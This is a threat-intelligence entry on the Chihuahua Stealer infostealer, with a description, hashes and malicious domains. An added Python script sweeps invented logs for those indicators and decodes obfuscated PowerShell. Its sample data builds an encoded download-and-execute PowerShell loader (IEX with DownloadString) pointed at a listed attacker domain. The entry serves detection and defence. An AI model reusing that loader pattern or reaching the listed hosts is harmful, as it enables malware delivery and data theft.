A New Breed of Infostealer
May 21, 2025, 7:33 p.m.
Description
A newly discovered .NET-based infostealer, Chihuahua Stealer, combines commodity stealer techniques with more advanced features. The infection begins with an obfuscated PowerShell script shared via Google Drive, which starts a multi-stage payload chain. Persistence is achieved through scheduled tasks, and the main payload targets browser data and crypto wallet browser extensions. Stolen data is compressed, encrypted with AES-GCM through the Windows CNG (Cryptography API: Next Generation) APIs, and exfiltrated over HTTPS. Stealth relies on the multi-stage execution, Base64 encoding, hex-string obfuscation and scheduled jobs, and each infected machine is tagged with a unique identifier. The stealer's sophistication shows in its use of the Windows cryptography API for encryption and in its thorough cleanup process.
Date
- Created: May 13, 2025, 1:12 p.m.
- Published: May 13, 2025, 1:12 p.m.
- Modified: May 21, 2025, 7:33 p.m.
Indicators
- c9bc4fdc899e4d82da9dd1f7a08b57ac62fc104f93f2597615b626725e12cae8
- afa819c9427731d716d4516f2943555f24ef13207f75134986ae0b67a0471b84
- https://onedrive.office-note.com/res?a=c&b=&c=8f2669e5-01c0-4539-8d87-110513256828&s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiI4YTJlNmI1MDQ4M2E5MWYyODkz
- https://flowers.hold-me-finger.xyz/index2.php.
- onedrive.office-note.com
- flowers.hold-me-finger.xyz
- cdn.findfakesnake.xyz
- cat-watches-site.xyz
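The indicators above are only useful once they are run against telemetry. The script below is an added example, not code from the original entry or from the malware's authors: it loads the entry's SHA-256 hashes and domains, sweeps a handful of constructed key=value log lines (DNS, proxy, file and process events; the field names, hostnames and every line are invented for the demo, and the proxy URL keeps only the indicator's host, not the truncated path from the list), matches domains including their subdomains, and peels the two generic obfuscation layers the description names (a Base64 -EncodedCommand, then long hex strings inside the decoded script) so that a domain hidden under those layers is still caught. The constructed PowerShell one-liner is a plausible hex-string loader written for this example; it is not the actual first-stage script.

```python
"""IOC sweep for the Chihuahua Stealer entry above.

Added example; not code from the original page or the report's author.
The log format, field names and every log line are constructed for this demo.
"""
import base64
import re
from urllib.parse import urlparse

# Indicators copied from the entry (sample hashes and C2/staging domains).
SHA256_IOCS = {
    "c9bc4fdc899e4d82da9dd1f7a08b57ac62fc104f93f2597615b626725e12cae8",
    "afa819c9427731d716d4516f2943555f24ef13207f75134986ae0b67a0471b84",
}
DOMAIN_IOCS = {
    "onedrive.office-note.com",
    "flowers.hold-me-finger.xyz",
    "cdn.findfakesnake.xyz",
    "cat-watches-site.xyz",
}

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value or key="quoted value"
PS_ENC_RE = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)', re.I)
HEX_RUN_RE = re.compile(r'(?:[0-9a-fA-F]{2}){16,}')  # 32+ contiguous hex chars


def parse_line(line):
    """Parse one constructed key=value log line into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def domain_matches(host, iocs):
    """Return the IOC that equals host or is a parent of it, else None."""
    host = host.lower().rstrip(".")
    for ioc in iocs:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


def decode_encoded_command(cmd):
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE) or return None."""
    m = PS_ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_hex_runs(text):
    """Decode long hex-only strings (generic hex-string obfuscation) to ASCII."""
    out = []
    for run in HEX_RUN_RE.findall(text):
        try:
            out.append(bytes.fromhex(run).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            pass
    return out


def scan_line(line):
    """Return a list of (indicator_type, value) hits for one log line."""
    rec = parse_line(line)
    hits = []
    if rec.get("sha256", "").lower() in SHA256_IOCS:
        hits.append(("sha256", rec["sha256"].lower()))
    hosts = [rec[k] for k in ("query", "dest") if k in rec]
    if "url" in rec:
        hosts.append(urlparse(rec["url"]).hostname or "")
    for host in hosts:
        ioc = domain_matches(host, DOMAIN_IOCS)
        if ioc:
            hits.append(("domain", ioc))
    decoded = decode_encoded_command(rec.get("cmd", ""))
    if decoded is not None:
        hits.append(("encoded_powershell", decoded))
        layers = [decoded] + decode_hex_runs(decoded)  # peel the hex layer too
        for layer in layers[1:]:
            hits.append(("hex_string", layer))
        for layer in layers:
            for ioc in DOMAIN_IOCS:
                if ioc in layer.lower():
                    hits.append(("domain", ioc))
    return hits


def sweep(lines):
    """Map line index -> hits for every line that matched at least one indicator."""
    return {i: h for i, line in enumerate(lines) if (h := scan_line(line))}


# Constructed sample telemetry (not real logs). The encoded command is a
# hypothetical hex-string loader built here, not the malware's own script.
_HEX_URL = "https://flowers.hold-me-finger.xyz/index2.php".encode().hex()
_SCRIPT = ("$h='" + _HEX_URL + "';$u=-join($h -split '(..)' -ne ''|"
           "%{[char][Convert]::ToInt32($_,16)});"
           "IEX((New-Object Net.WebClient).DownloadString($u))")
_ENC = base64.b64encode(_SCRIPT.encode("utf-16le")).decode()
SAMPLE_LOGS = [
    "type=dns host=WS01 query=flowers.hold-me-finger.xyz",
    "type=proxy host=WS01 url=https://onedrive.office-note.com/res?a=c",
    "type=dns host=WS02 query=www.cat-watches-site.xyz",
    "type=dns host=WS02 query=notcat-watches-site.xyz",
    "type=file host=WS01 sha256=C9BC4FDC899E4D82DA9DD1F7A08B57AC62FC104F93F2597615B626725E12CAE8",
    "type=file host=WS03 sha256=" + "0" * 64,
    'type=process host=WS01 cmd="powershell.exe -nop -w hidden -enc ' + _ENC + '"',
]

if __name__ == "__main__":
    for idx, hits in sweep(SAMPLE_LOGS).items():
        print(idx, hits)
```

Two details matter in practice: the domain check requires a dot boundary, so a look-alike such as notcat-watches-site.xyz does not fire on cat-watches-site.xyz, and hashes are lower-cased before comparison because EDR exports often emit them upper-case. The decoded PowerShell is reported as its own hit even when no indicator is found inside it, since an encoded command launching from a scheduled task is worth a look on its own.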